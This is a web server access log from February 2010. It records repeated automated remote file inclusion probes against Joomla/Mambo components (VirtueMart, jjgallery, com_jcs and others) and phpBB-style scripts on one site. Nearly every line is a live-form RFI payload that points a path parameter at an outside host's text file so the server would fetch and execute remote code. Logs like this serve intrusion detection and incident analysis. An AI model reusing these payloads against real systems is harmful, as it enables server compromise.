213.189.224.16 - - [21/Feb/2010:06:34:44 -0800] "GET /logs/access_100127.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:44 -0800] "GET /logs/access_100124.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:46 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:46 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:06:34:47 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:48 -0800] "GET /logs/access_100203.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:06:34:48 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:06:34:50 -0800] "GET /logs/access_100124.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:06:34:50 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:50 -0800] "GET /logs/access_100124.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:50 -0800] "GET /logs/access_100127.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:06:34:51 -0800] "GET /logs/access_100127.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:52 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:52 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:52 -0800] "GET /logs/access_100127.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:52 -0800] "GET /logs/access_100124.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:06:34:52 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:06:34:52 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:06:34:53 -0800] "GET /logs/access_100127.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [21/Feb/2010:06:34:53 -0800] "GET /logs/access_100124.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:59 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:34:59 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:35:01 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:35:01 -0800] "GET /logs/access_100124.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:35:01 -0800] "GET /logs/access_100127.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:35:03 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:35:07 -0800] "GET /logs/access_100203.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:35:10 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:35:10 -0800] "GET /logs/access_100203.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:06:35:21 -0800] "GET /logs/access.log/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:35:22 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:35:22 -0800] "GET /logs/access_100203.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:06:35:27 -0800] "GET /logs/access.log/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:06:35:30 -0800] "GET /logs/access_100116.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:35:30 -0800] "GET /logs/access_100203.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [21/Feb/2010:06:35:51 -0800] "GET /logs/access_100127.log//components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [21/Feb/2010:06:35:51 -0800] "GET /components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [21/Feb/2010:06:35:51 -0800] "GET /logs//components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:36:21 -0800] "GET /logs/access_100202.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
64.6.109.50 - - [21/Feb/2010:06:36:29 -0800] "GET /logs/access_100121.log//components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:36:47 -0800] "GET /logs/access_100124.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:36:47 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:36:47 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:37:30 -0800] "GET /logs/access_100124.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:37:30 -0800] "GET /logs/access_100127.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:37:35 -0800] "GET /logs/access_100127.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:37:35 -0800] "GET /logs/access_100124.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:37:36 -0800] "GET /logs/access_100124.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:37:36 -0800] "GET /logs/access_100127.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [21/Feb/2010:06:37:40 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [21/Feb/2010:06:37:40 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:37:49 -0800] "GET /logs/access_100124.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:37:49 -0800] "GET /logs/access_100127.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:38:19 -0800] "GET /logs/access_100127.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:38:19 -0800] "GET /logs/access_100124.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:38:32 -0800] "GET /logs/access_100124.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:38:32 -0800] "GET /logs/access_100127.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:38:40 -0800] "GET /logs/access_100127.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:38:40 -0800] "GET /logs/access_100124.log////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:06:39:00 -0800] "GET /logs/access_100207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [21/Feb/2010:06:39:01 -0800] "GET /components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [21/Feb/2010:06:39:01 -0800] "GET /logs//components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [21/Feb/2010:06:39:04 -0800] "GET /logs/access_100121.log%20%20//components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [21/Feb/2010:06:39:13 -0800] "GET /logs//components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [21/Feb/2010:06:39:13 -0800] "GET /components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [21/Feb/2010:06:39:17 -0800] "GET /logs/access_100121.log%20%20//components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:06:39:20 -0800] "GET /logs/access_100129.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:06:39:29 -0800] "GET /logs/access_100208.log/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:06:39:29 -0800] "GET /logs/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:06:39:29 -0800] "GET /components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:06:39:29 -0800] "GET /logs/access_100126.log/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:06:39:31 -0800] "GET /logs//soik/bbs///write_comment_update.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:06:39:31 -0800] "GET /soik/bbs///write_comment_update.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:06:39:32 -0800] "GET /logs/access_100124.log%20%20//soik/bbs///write_comment_update.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:06:40:33 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://fishcountapp.com/wp-content/upgrade/language/motd/f1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:06:40:33 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://fishcountapp.com/wp-content/upgrade/language/motd/f1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:06:40:33 -0800] "GET /logs/access_100115.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://fishcountapp.com/wp-content/upgrade/language/motd/f1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:40:42 -0800] "GET /logs/access_100201.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:40:43 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:40:43 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:40:47 -0800] "GET /logs/access_100218.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:40:48 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:40:48 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
218.55.227.145 - - [21/Feb/2010:06:41:18 -0800] "GET /config/dbutil.bck.php?confdir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [21/Feb/2010:06:41:18 -0800] "GET /logs/access_100125.log%20%20//config/dbutil.bck.php?confdir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [21/Feb/2010:06:41:19 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [21/Feb/2010:06:41:21 -0800] "GET /logs/access_100130.log%20%20//config/dbutil.bck.php?confdir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:06:41:30 -0800] "GET /logs/access_100115.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://fishcountapp.com/wp-content/upgrade/language/motd/f1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:06:42:05 -0800] "GET /logs/access_100204.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:42:11 -0800] "GET /logs/access_100130.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
216.119.103.16 - - [21/Feb/2010:06:42:19 -0800] "GET /logs/access_100206.log%20%20//index.php?option=com_search&mosConfig.absolute.path=http://lifehappens.org/catalog_ZEN_old/extras/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [21/Feb/2010:06:42:19 -0800] "GET /logs//index.php?option=com_search&mosConfig.absolute.path=http://lifehappens.org/catalog_ZEN_old/extras/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [21/Feb/2010:06:42:20 -0800] "GET /index.php?option=com_search&mosConfig.absolute.path=http://lifehappens.org/catalog_ZEN_old/extras/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [21/Feb/2010:06:42:29 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [21/Feb/2010:06:42:29 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [21/Feb/2010:06:42:33 -0800] "GET /logs/access_100202.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [21/Feb/2010:06:42:38 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [21/Feb/2010:06:42:38 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [21/Feb/2010:06:42:41 -0800] "GET /logs/access_100202.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:06:42:41 -0800] "GET /logs/access_100202.log//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [21/Feb/2010:06:43:06 -0800] "GET /logs/access_100206.log%20%20//index.php?option=com_search&mosConfig.absolute.path=http://lifehappens.org/catalog_ZEN_old/extras/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [21/Feb/2010:06:43:06 -0800] "GET /index.php?option=com_search&mosConfig.absolute.path=http://lifehappens.org/catalog_ZEN_old/extras/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [21/Feb/2010:06:43:06 -0800] "GET /logs//index.php?option=com_search&mosConfig.absolute.path=http://lifehappens.org/catalog_ZEN_old/extras/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:43:11 -0800] "GET /logs/access_100206.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:43:12 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:43:12 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:06:43:14 -0800] "GET /logs/access_100115.log//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:06:43:15 -0800] "GET /soik/bbs///write_comment_update.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:06:43:15 -0800] "GET /logs/access_100124.log%20%20//soik/bbs///write_comment_update.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
